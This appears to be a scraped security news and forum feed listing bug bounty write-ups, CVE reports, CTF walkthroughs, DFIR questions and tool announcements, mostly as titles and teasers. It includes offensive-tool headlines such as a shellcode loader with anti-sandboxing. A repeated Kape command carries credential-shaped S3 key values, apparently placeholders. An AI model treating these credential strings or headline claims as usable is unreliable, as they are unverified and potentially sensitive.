    LinkFinder : a tool written in python that finds the endpoints from/in JavaScript files. Continue reading on Medium »  ( 1 min )
    How to Setup/Configure Burpsuite with Firefox
    Hello all i am back with another blog on bug bounty we will see how we can setup/configure burpsuite with firefox to intercept all… Continue reading on Medium »  ( 1 min )
    Exploiting CVE-2019–5418- File Content Disclosure on Rails
    In Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1, and v3, a File Content Disclosure vulnerability exists where properly designed… Continue reading on Medium »  ( 1 min )
    Broken Link Hijacking - Mr. User-Agent
    Summary : Continue reading on Medium »  ( 3 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much Continue reading on Medium »  ( 3 min )
  • Open

    How do Secrets Managers help?
    Nearly everyone seems to say that the best way to store secrets in a cloud environment is to put them in a secrets manager and only fetch them when needed. This has the advantage of allowing seamless key rotation, adding IAM policies, etc. Does this actually increase the security posture of the app though? The app still needs to authenticate with a key manager somehow - I would guess by way of an API token or similar. If the app or the box serving the app get owned, doesn't this basically compromise all the secrets in the secret manager accessible to the app? Also, assuming my previous statement is correct, there must be a "bootstrapping secret" which is injected to the app that lets it talk to the secrets manager. How does the app get access to that secret? I don't mean in a specific cloud (e.g. Azure, GCP, AWS) - just in general, how does whoever is providing the secret know to trust the app? submitted by /u/parallelocat [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with around with Kape. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target to send to S3: .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st hQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9X Is this the way? From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
    Given that smart light bulbs can be 'hidden' in plain sight, and most of them are reflashable - how long will it be until the first one is used to gain a foothold inside a target network?
    I was actually looking for something to use as a PWNplug, but even those stand out a bit, whereas wifi light bulbs are ... just light bulbs, with wifi, and a devkit. https://hackaday.com/2020/02/11/custom-firmware-for-cheap-smart-bulbs-is-a-cinch-to-tinker-with/ Most of them seem to be based on the same Expressif chipset https://github.com/ct-Open-Source/tuya-convert https://github.com/arendst/Tasmota This was more of a rhetorical question, but I thought it might interest some of you. submitted by /u/boli99 [link] [comments]  ( 3 min )
    Career in Bug Bounty?
    I read an article about a pen tester making 300k off a bug bounty. My question is can someone live off this? Can anyone do this with the right knowledge and training? Do you have to be some sort of genius? submitted by /u/Bugskee [link] [comments]  ( 3 min )
  • Open

    Who Needs A Niche Threat Actor Specific IoC (Indicator of Compromise) STIX/STIX2/TAXII Feed?
    UPDATE: The feed's official web site including the brochure. Dear blog readers, Who needs access to my STIX/STIX2/TAXII Threat Actor Specific IoC (Indicator of Compromise) feed? Drop me a line today at dancho.danchev@hush.com Stay tuned!
  • Open

    Resource/Reference for Crypto mining Artifacts?
    Looking for a good resource (web page, poster, graphic etc.) for locating artifacts that indicate the use of a crypto miner on a computer. Does anyone know of anything? submitted by /u/admincee [link] [comments]  ( 1 min )
    Magnet Web Page Saver
    Has anyone here had working experience with the free tool Web Page Saver? I am looking into using it at my lab and have some serious questions about how it work and when/what cases it should be used with. Any guidance is appreciated submitted by /u/trex4n6 [link] [comments]  ( 1 min )
    Bulk Extractor Review
    Howdy all! Newbie alert! So I currently started using Bulk_Extractor with Volatility tor Memory Forensics! My real question is how reliable are the results obtained from Bulk Extractor? I see a lot of explicit websites in my Bulk Extractor Domain Histogram results! But can’t be able to find them in Volatility! Any idea of how this works? submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with around with Kape. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st hQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9X ​ From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
  • Open

    Ask HN: Vulnerability Research in 2032?
    Hi HN, I've always been curious about bug hunting. Finding vulns. I have some foundational knowledge like fuzzing, basic web security and reading assembly, but I am also aware of all the improvements in software and web security and there are so many new tech stacks, languages and platforms these days. Where does one begin? Is it worth learning how to find memory safety vulns given how C and friends are dying (and when they are alive things like CFG and appguard make it impossible to exploit them)? Are there any modern books or sites you recommend? Should I be leaning some language (rust/go?) or stack (k8s?) as a prerequisite? Comments URL: https://news.ycombinator.com/item?id=30324988 Points: 1 # Comments: 0  ( 1 min )
    Apple emits emergency fix for exploited-in-the-wild WebKit vulnerability
    Article URL: https://www.theregister.com/2022/02/11/apple_emergency_webkit/ Comments URL: https://news.ycombinator.com/item?id=30324643 Points: 4 # Comments: 3  ( 9 min )
  • Open

    SysWhispers Shellcode Loader w/ ETW patching, anti-sandboxing, and 6 execution options
    submitted by /u/ChadMotivation [link] [comments]
  • Open

    What is a Skip Tracer?
    Skip tracing is the process of tracking down people who are particularly hard to find, whether they’re persons-of-interest, fact witnesses… Continue reading on Medium »
    Creating a Honeypot
    First it’s important to describe what a honeypot is and why it’s a good idea to create on. In the cyber security field a honeypot is… Continue reading on Medium »  ( 9 min )
  • Open

    SecWiki News 2022-02-13 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-13 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Mostly big boobs photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
  • Open

    CTF中PHP相关题目考点总结(下)
    本文主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。  ( 2 min )
    CTF中PHP相关题目考点总结(上)
    本文总结了ctfshow题目中遇到的关于PHP的考点。  ( 2 min )
  • Open

    Widespread CSRF on authenticated POST endpoints
    UPchieve disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1309435
  • Open

    CVE-2021-45464 – LKVM Escape
    Article URL: https://www.kalmarunionen.dk/writeups/2021/hxp-2021/lkvm/ Comments URL: https://news.ycombinator.com/item?id=30320463 Points: 4 # Comments: 0  ( 11 min )
    The long road to a fix for CVE-2021-20316
    Article URL: https://lwn.net/SubscriberLink/884052/c946bb7f8d39c54e/ Comments URL: https://news.ycombinator.com/item?id=30319122 Points: 8 # Comments: 0  ( 16 min )

  • Open

    Biohazard- Tryhackme CTF
    This is a write-up about the Biohazard CTF room from Tryhackme (a free cybersecurity training site that provides machines for you to… Continue reading on Medium »  ( 8 min )
    Exploit SUID misconfiguration for privilege escalation
    In this article, I am going to explain what are SUID binaries how to exploit them for getting root shell i.e privilege escalation on the… Continue reading on Medium »  ( 2 min )
  • Open

    [h1-2102] Break permissions waterfall
    Shopify disclosed a bug submitted by hogarth45: https://hackerone.com/reports/1088159 - Bounty: $500
    Blind XSS on Twitter's internal Jira panel at allows exfiltration of hackers reports and other sensitive data
    Twitter disclosed a bug submitted by iambouali: https://hackerone.com/reports/1369674 - Bounty: $5040
  • Open

    My Pentest Log -6-
    Greetings Everyone from Hippodrome (Constantinople), Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 8
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web Technologies Knowledge required for starting with the web Exploitation Part-3
    Hello Hackers hope so You are doing well. I myself Manan Aggarwal a Btech Student is Here to Present you the blog in the continuation of… Continue reading on Medium »  ( 6 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways… Continue reading on Medium »  ( 2 min )
    Hacking My ISP For FREE Internet
    Note: This article is only for educational purpose. Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - BROKEN ACCESS CONTROL LAB ÇÖZÜMLERİ
    Access Control (Erişim Kontrolü) veya Authorization (Yetkilendirme), talep edilen eylemlere veya erişim kaynaklarına, kimin veya neyin… Continue reading on Medium »  ( 10 min )
    HOW I GOT THE BOUNTY OF $280+ in just a matter of seconds…
    Hey folks, Continue reading on Medium »  ( 2 min )
    Improving the impact of a mouse-related XSS with styling and CSS-gadgets
    I will write more about how I make PoCs in the future. But with special care, I work out scenarios for vulnerabilities that need user… Continue reading on Medium »  ( 2 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
    Bug Bounty: My First Five Figure Payout
    This is the post from my Telegram channel about Bug Bounty, where I share my experience and knowledge as well as just write about being… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-02-12 Review
    开源软件包与软件供应链安全漏洞修复分析研究 by ourren 攻防对抗的十八层地狱 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-12 Review
    开源软件包与软件供应链安全漏洞修复分析研究 by ourren 攻防对抗的十八层地狱 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    OSINT Automation Tool — Spiderfoot
    Spiderfoot Continue reading on Medium »  ( 1 min )
    Valerie vs Valoree
    Yes, this is really happening.  No, I’m not running to cause ballot confusion. Continue reading on Medium »  ( 1 min )
    How To Find Timestamps For Verification
    Finding exact timestamps in web material is a must-have ability for OSINT and verification researchers, but where do you look? Continue reading on Medium »
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
  • Open

    The Top 13 Ethical Hacking Courses on Udemy (2022)
    submitted by /u/Jan_Prince [link] [comments]
  • Open

    Technical documents for JOINT POLAR SATELLITE SYSTEM
    A little over my head but if any climate geeks want to access raw data, here's the tools. Main index directory: https://www.jpss.noaa.gov/assets/ Community Satellite Processing Package (open source direct broadcast): http://cimss.ssec.wisc.edu/cspp/ Example: https://www.jpss.noaa.gov/assets/pdfs/technical_documents/472-00340_J2_HRD_to_DBS_RF_ICD_Rev_C.pdf API references: https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-01_JPSS-API-Users-Guide-Vol-I_0123A.pdf https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-02_JPSS-API-Users-Guide-Vol-II_0124-.pdf submitted by /u/inoculatemedia [link] [comments]
    Audio and art programs (mostly) for Atari 2600
    http://www.qotile.net/files/ submitted by /u/inoculatemedia [link] [comments]
  • Open

    现代前后端分离式应用API渗透测试探究
    越来越多的国内互联网企业为了提高开发测试迭代速度以及前端统一的需求,搭上了前后端分离的快车。基于新的前端框架,如何更高效的进行API测试就变得越加重要。  ( 1 min )
    NodeJS堆溢出?原因是默认设限了内存上限。解除封印!
    使用NodeJS开发的应用,如果需要处理大量数据,可能导致堆溢出。错误提示中,会有“JavaScript heap out of memory”。
  • Open

    CISSP Domain 1 - Episode 5 - Security Roles and Responsibilities, Control Frameworks, Due care & Due Diligence, Policies, Standards, Procedures, Guidelines & Baseline and Threat Modeling by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
  • Open

    How do I get my foot in the door with forensics?
    I have my masters in digital forensics but like a fool I never did anything with it. I’m a quick study and will only take me about a week or two to relearn everything. I have a security clearance and currently with in government contracting as a project manager but no company is biting. I want to finally make the switch but it’s hard when you don’t have in lab experience or the certs. Any advice on how to get restarted in this field? TIA! submitted by /u/kindreddino [link] [comments]  ( 6 min )
    Imaging Android and iOS devices
    Hello, can anyone teach me how to image these devices. Or if you can point me to some tutorials. I have been trying to learn but I keep failing. Thanks in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
  • Open

    곧 Chrome에서 document.domain을 설정할 수 없습니다 ⚠️
    Chrome will disable modifying document.domain to relax the same-origin policy 구글에서 최근 document.domain에 대한 크롬 브라우저의 변경을 예고했습니다. 브라우저 3사는 서로 유사하게 정책을 가져가기 때문에 아마 firefox, safari도 비슷한 형태로 변화될 가능성이 높겠죠. 요약하자면 Chrome 106+ 이후부턴 기본적으로 document.domain에 대한 setter가 제거된다고 합니다. document.domain 사실 document.domain은 문제가 좀 있습니다. document.domain이 도메인의 포트 번호 부분을 무시하기 때문에 만약 동일한 도메인에서 포트가 다른 서비스로 서빙되는 경우 원래대로면 서로는 same-origin이 아니지만, document.
    ZAP의 새로운 Networking Stack
    지난 목요일 밤 ZAP Developers Groups에 simon이 한가지 내용을 공유했습니다. 바로 ZAP의 Networking Layer에 대한 이야기고, 저는 제목을 보자마자 어떤 내용인지 직감했습니다. (제가 정말 기다렸던 내용이거든요 🤩) Weekly 버전에선 networking stack이 달라졌어! 어떤 것을 개선하기 위해 이러한 작업이 진행되었는지, 그리고 어떻게 바뀌었고 앞으로 어떻게 될지 미리 살펴봅시다 :D Why? 먼저 Networking stack, layer는 실제로 사용자에게 보이는 부분은 별로 없습니다. Application 내부에서 네트워크를 처리하기 위한 부분인데, ZAP은 오래된 프로젝트다 보니 베이스로 사용된 Networking 부분이 오래된 Apache Commons HttpClient library를 사용했었습니다.
  • Open

    Apple fixes Mac battery drain, WebKit vulnerability in software updates
    Article URL: https://arstechnica.com/gadgets/2022/02/apple-patches-security-holes-and-bugs-with-ios-15-3-1-and-macos-12-2-1/ Comments URL: https://news.ycombinator.com/item?id=30308727 Points: 2 # Comments: 0  ( 3 min )

  • Open

    Simple tool to find client side prototype pollution vulnerability
    submitted by /u/boch33n [link] [comments]
    Pre-auth WAN remote root for Cisco RV340 VPN Gateway Router
    submitted by /u/ChoiceGrapefruit0 [link] [comments]
    Cisco ASDM: Manage at Your Own Risk
    submitted by /u/chicksdigthelongrun [link] [comments]
    WordPress < 5.8.3 - Object Injection Vulnerability
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    A simple tool to audit Linux system libraries to find public security vulnerabilities.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/Margaruga [link] [comments]
    Internet-Wide Study: State Of SPF, DKIM, And DMARC - RedHunt Labs
    submitted by /u/redhuntlabs [link] [comments]  ( 1 min )
  • Open

    Mellium 0.21.1 fixes CVE-2022-24968
    Article URL: https://mellium.im/cve/cve-2022-24968/ Comments URL: https://news.ycombinator.com/item?id=30308038 Points: 1 # Comments: 0  ( 1 min )
    Apple fixes actively exploited zero-day (CVE-2022-22620)
    Article URL: https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/ Comments URL: https://news.ycombinator.com/item?id=30304109 Points: 1 # Comments: 0  ( 3 min )
  • Open

    How safe is this obscure software my friend bought on eBay?
    My friend is having technical difficulties with his iPad (he reset it and you can’t get through the welcome/setup without allowing remote access management to a certain company, which he doesn’t want to do) and he bought some software on eBay that promises to help bypass that error. His computer is old and won’t run the software when he tries to. My MacBook is brand new and so he asked me if I could download the eBay software onto my computer to try to fix the iPad. To me that doesn’t seem like something I want to download onto my new laptop. Maybe I shouldn’t have binged all of the darknet diaries podcast but idk doesn’t feel safe. Here’s what it looks like. Any thoughts? submitted by /u/aimhighswinglow [link] [comments]  ( 4 min )
    Is is safe to feed patterns to hashing functions in order to create passwords for websites?
    I had this idea on how to generate supposedly safe passwords for different websites/accounts that wouldn't require passwords to be memorized or stored. The idea is to 1 - Come up with a short default string that would never change (say, "bubly42") 2 - Append the name of the website to that string for each website you make an account. For example, when creating an account for airbnb it'd produce the string "bubly42airbnb" 3 - Run that string (bubly42airbnb) through a hash function 4 - Use the output of the hash function as the password for the website This would have the upside of not requiring memorization or storage of passwords, while still generating a unique password for each site. I can just generate the password on the fly. Obvious downside is that if someone figures your pattern out, they pretty much can figure out all of your passwords. Is there anything else that I'm missing? Is this considered safe? (Btw, sorry if I'm posting on the wrong place. If that's the case, can someone direct me to a good subreddit to post this in?) submitted by /u/djoncho [link] [comments]  ( 4 min )
    Possible malware in official Torguard windows VPN client ??
    Torguard's VPN client intermittently consumes 50% cpu, for long periods, unrelated to any network activity, which I find suspicious. Details below. I've raised this with TG's tech support who have repeatedly denied that any such behavior exists. I'm seeing this consistently on 4 windows machines (including one VM) where I have TG running. I'm not sure where to report this as there is no TG subreddit and the VPN subreddit doesn't allow mentioning specific services. Hopefully you folks can point me in the right direction or give advice. So, if the app is running and the VPN is connected, even if there are no other apps open, TG client will randomly begin consuming a constant 50% CPU. I can't correlate this with any other condition like network traffic or other app activity or any obvious thing TG is doing. If I minimize the TG client window, it stops. And then it starts again in a few minutes, and so I repeat this remedy, and it stops. If I don't do this it continues indefinitely. So, every computer this is running on experiences a significant heat/wattage increase and CPU performance degradation due to TG. I took screenshots of this behavior using task manager. I also watched it using winternals' process monitor, which gave much more detailed info than this. ---- But this forum doesn't allow pictures. submitted by /u/Dougolicious [link] [comments]  ( 2 min )
    How to get over the unrecognized app/publisher warning in Windows
    All, I am writing an executable to put on a website for download. Every time I go to download it, I get an "unrecognized app, unknown publisher warning". It's not tagged as malicious, but it's tagged as "unknown publisher" which makes it appear that way. Does anyone know how to add a publisher? Is that something a non-corporation can do? Or could I at least add a certificate or something to make Windows calm down? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    How to get access on clean-mx.de
    Correct me if I am on the wrong subreddit, I have seen some people talk about this site in here, but how do you get access on clean-mx? I tried creating an account in there(registration form), but I haven't got a response back, unless I am being impatient. I also tried contacting the email, but it is dead as stated in the site. There is multiple sites to register accounts, xlogin.php, xregister.php, etc etc. I can see it's alive because when I search the site up, I see the dates from right now. ​ Is this site restricted to companies only or not? Can you not register anymore? ​ (couldnt post this in a other subreddit, my post kept getting removed because they thought it was a tech-support question) submitted by /u/RainbowIsRainbow [link] [comments]  ( 1 min )
    What are the security monitoring can accomplish these scanning and detection?
    Hi Folks, As the title says, what tools can help to achieve these objectives Real time scan the network to detect presence of unauthorized hardware, software, and firmware components within the network. To scan and detect in real- time the addition of devices into network and notify the security administrator via email. submitted by /u/techno_it [link] [comments]  ( 3 min )
    Pen test dropbox running Win OS with Kali VM - with 4G callback
    Looking for some hardware advice for a pen test dropbox. I'd like the unit to be responsive with desktop-speed chipsets, x86/x64 based, and have an out-of-band 4G SIM callback for when client networks prevent outbound connectivity. With Windows as the primary OS, is there any way to auto connect the 4G/cellular modem with Windows, as there is with Linux (ie wvdial)? Are there any capable NUC type devices or mini PCs with inbuilt 4G capability. Want to avoid having USB modems sticking out the side, perhaps similar to rPi's cellular hat, but not rPi (or other SBCs) which would struggle with a Win with Kali VM setup. Happy to spend a bit on hardware, are there many notable boxes other than the Intel NUC, Zotac Zbox or MSI Cubi? Seen a few decent build docs that almost fit the bill, but not quite: https://infosecwriteups.com/part-2-build-the-pen-test-drop-box-69278526886a https://www.blackhillsinfosec.com/pentesting-dropbox-on-steroids/ https://www.blackhillsinfosec.com/how-to-build-your-own-penetration-testing-drop-box/ https://www.sprocketsecurity.com/blog/penetration-testing-dropbox-setup-part1 Thanks! submitted by /u/ama21n [link] [comments]  ( 1 min )
    Would a "technical support specialist" be a good start to eventually end up in cyber security?
    Hello. I'm graduating college soon and have an offer as a support specialist. The responsibilities are as follows: Provide 1st-tier technical support for production support issues Troubleshoot system errors by reviewing technical logs, system documentation, and application logic Monitor and triage errors generated by automated tasks in production Collaborate with Client Excellence team to ensure users’ technical support issues are resolved quickly On call rotation for urgent production issues during weekends and holidays I've been applying to IT jobs but have had little luck. Would a job like this be a good interdiction into security? Or should I look for a more traditional IT job? submitted by /u/Hellothere6667 [link] [comments]  ( 1 min )
  • Open

    LNK Files, Again
    What, again?!?! I know, right?!? Not long ago, I read this fascinating article from Joe Helle that discussed malicious uses for Windows shortcuts, or LNK files, and also discussed a Python3 scripts called "lnkbomb". As a side note, check out what Joe had to share about persistence via WSL2! As anyone who's followed me for a minute knows, I love...L   O   V   E...me some LNK files. Shortcut files are something that we see all the time, have been around for a long time (much like ADSs), but folks in the DFIR field are so focused on the "shiny hot newness", that this file type is very often overlooked and not fully exploited. The technique Joe discusses is similar to modifying the iconfilename field of a shortcut file, so that even if the "bad guy" is evicted from an infrastructure, any action that launches the LNK file results in credentials being passed via HTTP or WebDAV, where they can be collected, cracked, and then used by the threat actor. LNK files have a lot of uses, and understanding the format and structure is helpful in a lot of different ways. One example is that automatic JumpLists follow the OLE/structured storage format, and all but the DestList stream consist of LNK file formatted streams. Another example is that the building blocks of LNK files, shell items, are also the core building blocks of several Registry-based artifacts, such as shellbags. Beyond that, however, threat actors have used LNK files as lures in social engineering and phishing attacks; this means that the threat actor has built the LNK files within their own infrastructure, within their own development environment. As such, sending these files as lures is "free money" to both DFIR and CTI analysts, if they're able to leverage those files and their component metadata. So...while I know Windows 11 is out, and everyone's excited about the shiny new hotness, let's not forget that there's a lot that has worked since Windows XP (or even prior to that) and still continues to be an issue today.  ( 4 min )
  • Open

    How to Choose a Security Plugin That’s Right for Your Website
    Finding the perfect security plugin for your website is important, but it’s also crucial you find the proper one that suits your needs. WordPress plugins are a dime a dozen, so we’ll be discussing how to narrow your options and what to look for in a reliable plugin so you can safely install it on your website. Some of the most frequent issues with poorly managed plugins include eating up memory in excess, 500 internal server errors, downtime, white pages, and slow response times. Continue reading How to Choose a Security Plugin That’s Right for Your Website at Sucuri Blog.
  • Open

    Honeypot OSINT
    In this post I will be going through the open source intelligence process I went through following an attack performed against my honeypot. Continue reading on Medium »  ( 8 min )
    Building a public OSINT lab target
    The Utah Valley University Cyber Security Program needed a realistic target that students could use to learn OSINT and offensive tools… Continue reading on Medium »  ( 1 min )
    [EN] TryHackMe 25 Days of Cyber Security: Day 14 Walkthrough
    [Day 14] OSINT Where’s Rudolph? Continue reading on Medium »  ( 3 min )
    Tallin To Search More Churches — OSINT Challenge 14
    On Dec 27, 2021, OSINT Dojo shared a OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken. Please… Continue reading on Medium »  ( 1 min )
  • Open

    Adding customers to victim’s store via Insecure Direct Object Reference
    Hello! I am back with my 2nd bug bounty write up. This time I’ll be showing you how I found an Insecure Direct Object Reference bug on an… Continue reading on Medium »  ( 1 min )
    QRCDR Path Traversal Vulnerability
    QRCDR is a popular PHP — JavaScript QR-Code Generator, which is widely used for creating customized QR-Code in easy steps. also, it’s used… Continue reading on Medium »  ( 2 min )
    Hacking ticketastic
    Hi guys! I’m back with another great blog, with this blog you can learn more about SQLi and Cross Site Request Forgery (CSRF). Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 7
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web technologies required for starting with the web Exploitation Part-2
    Hello Myself Manan Aggarwal is here to present the Blog about the Basic Web technologies required for starting with the web Exploitation… Continue reading on Medium »  ( 4 min )
    Introduction to Spring Boot Related Vulnerabilities
    Spring Boot related vulnerability learning materials, collection of utilization methods and skills, black box security assessment checklist Continue reading on Medium »  ( 12 min )
    iOS jailbreak dev wins $2M bounty for finding critical Optimism bug
    Continue reading on Medium »  ( 2 min )
    VulnLab SQL Injection— Dynamic Application Security Testing #3
    Assalamualaikum Wr.Wb Continue reading on Medium »  ( 6 min )
  • Open

    Amcache SHA-1 mismatch
    Hoping someone has seen this or has an idea what may be happening. I am performing a review and identified an installer file as an item of interest. I see the file in the host’s Amcache hive with a SHA-1 (“A”) hash. However, the recovered file has a different SHA-1 hash on disk (“B”). When running the executable on my test system and comparing it to that test machine’s Amcache, I see the same behavior. Amcache has hash “A” and the executable has hash “B.” Every other program I’ve sampled has hash matches; it seems like just this one is off. What gives? For specifics, I am using RegistryExplorer and Amcache Parser (both Zimmerman tools) for Amcache analysis. I am hashing with both X-Ways and Hasher (also Zimmerman). When reviewing Amcache Parser, I am matching the hash to the executable …  ( 3 min )
    Does anyone have Magnet Acquire download link without filling the form?
    I can't afford the axiom (or whatever it is called) so can anyone provide me the link? Thank you so much! submitted by /u/Hopelessssssssss [link] [comments]  ( 1 min )
    Announcing Opensource X-Ways HashExporter Extension
    This opensource extension allows you to dump all the hashes from an image using X-Ways command-line. https://github.com/PolitoInc/X-Ways-HashExporter-Extension submitted by /u/Alarming_Arm_7724 [link] [comments]  ( 1 min )
    What program should I specialize in if I cannot chose digital forensics?
    Computer Science and Engineering with specialisation in Blockchain Technology Computer Science and Engineering with specialisation in Information Technology Computer Science and Engineering with specialisation in Data Science. Or does it not matter as long as it is Csc ? submitted by /u/nodogsareevil [link] [comments]  ( 1 min )
    What transferable skills does forensics provide?
    I am currently a digital forensic analyst of both phones and computers for law enforcement. I want to transition into a new tech role, such as infosec or another form of cyber sec but looking at the job specs for 90% of these roles I do not meet the requirements. I’m considering self funding a cert such as CISSP or Security+ as this will most likely help. What sort of jobs can my current role land me in? submitted by /u/gofigured21 [link] [comments]  ( 3 min )
    CHFI Content Weightage
    Hello, Can we guess the content weightage of CHFI in the actual exam? I mean how can we know which modules will have more questions and other modules will have fewer questions in exam? I need to take the test and the book is very lengthy that can't be read as a whole so I want to get info about modules' weightage so I can learn them first (which will have more questions in the exam) and then the remaining modules (which have fewer questions). If not exactly any guess about it? submitted by /u/hardfire005 [link] [comments]  ( 1 min )
    Learning DFIR?
    Hi everyone. I am eJPT certified and been doing tryhackme for a year now. I want to move towards blue side, especially forensics and incident response. What i wanna ask is what is best resource/website to learn dfir/soc etc Is CHFI course content good? Are elearn security forensics and incident response courses and certs valuable? Or should i stick with tryhackme (it has less content regarding blue teaming) I have also heard of securityblueteam so is the investment there invaluable? Thanks submitted by /u/Nightkinnng [link] [comments]  ( 1 min )
  • Open

    CALISHOT 2022-02: Find ebooks among 348 Calibre sites this month
    submitted by /u/krazybug [link] [comments]  ( 1 min )
    archaeological dig photos from Iraq
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    [q] Index template/website script
    Hi guys, I hope this is the correct place to ask; I want to make a website where I can index certain posts and urls. (like a blog but easier) could you please guide me? ​ tyvm submitted by /u/zuperfly [link] [comments]  ( 1 min )
    A way to clone an Open Directory?
    Is there a can clone/upload all the files from an OD to my shared google drive? i know about rclone but since it's not easy to use, i don't want to waste time with it if can't do the required task. + Is there a tool that can upload a shared google drive file to my shared drive? again, i know about "make a copy option" but that is not usable if the file is over the size of the free space you drive has. submitted by /u/CompetitiveMango12 [link] [comments]  ( 2 min )
